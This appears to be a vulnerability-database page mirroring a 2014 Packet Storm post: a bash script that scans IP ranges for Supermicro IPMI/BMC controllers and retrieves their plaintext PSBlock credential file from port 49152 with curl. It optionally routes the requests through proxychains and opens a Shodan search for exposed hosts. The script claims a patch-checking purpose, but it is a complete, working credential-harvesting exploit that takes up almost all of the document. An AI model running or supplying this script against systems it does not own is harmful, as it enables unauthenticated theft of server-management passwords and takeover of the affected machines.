Lucene search
K

Supermicro IPMI/BMC Cleartext Password Scanner

🗓️ 24 Jun 2014 00:00:00Reported by 1N3Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 86 Views

Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3 allows remote, unauthenticated attackers to request PSBlock file containing plain text IPMI username and password info via port 49152. This script scans networks for vulnerable systems that require patching

Code
`#!/bin/bash  
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3  
# http://treadstonesecurity.blogspot.ca  
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]  
#  
# ABOUT:  
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to   
# request the file PSBlock via port 49152. This plain text password file contains IPMI   
# username and password information. This script allows users to scan their networks  
# check for vulnerable systems that require patching.   
#  
# USAGE:   
# ./supermicro_scan.sh 74.200.8.237 - Single host scan  
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy  
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ  
#  
  
clear  
echo "(--==== http://treadstonesecurity.blogspot.ca"  
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"  
echo ""  
  
UNICORNSCAN=`which unicornscan`  
CURL=`which curl`  
PROXYCHAINS=`which proxychains`  
TARGET=$1  
PROXY=$2  
  
if [ "$UNICORNSCAN" == "" ]; then  
echo "(--==== Unicornscan not installed! Exiting..."  
exit  
fi  
  
if [ "$PROXYCHAINS" == "" ]; then  
echo "(--==== Proxychains not installed! Continuing scan without proxy support..."  
exit  
fi  
  
if [ "$CURL" == "" ]; then  
echo "(--==== Curl not installed! Exiting..."  
exit  
fi  
  
if [ -z "$1" ]; then  
echo "(--==== Usage: $0 <CIDR|IP> [proxy]"  
exit  
fi  
  
if [ $TARGET == "shodan" ]; then  
# SCAN USING SHODANHQ SEARCH  
echo "Searching ShowdanHQ..."  
iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &  
exit  
fi  
  
if [ "$PROXY" = "proxy" ]; then  
#PROXY ENABLED  
echo "(--==== Scanning via proxy..."  
# SCAN FOR THE DEFAULT FILES AND PORTS  
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do   
echo "(--==== Extracting User/Pass from $a"  
echo "(--==== Sending GET http://$a:49152/PSBlock"  
proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings  
done  
exit  
  
else   
# NO PROXY  
echo "(--==== Scanning via direct connection..."  
# SCAN FOR THE DEFAULT FILES AND PORTS  
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do   
echo "(--==== Extracting User/Pass from $a"  
echo "(--==== Sending GET http://$a:49152/PSBlock"  
curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings  
done  
exit  
  
fi  
  
echo ""  
echo "(--==== Scan Complete!"  
exit   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation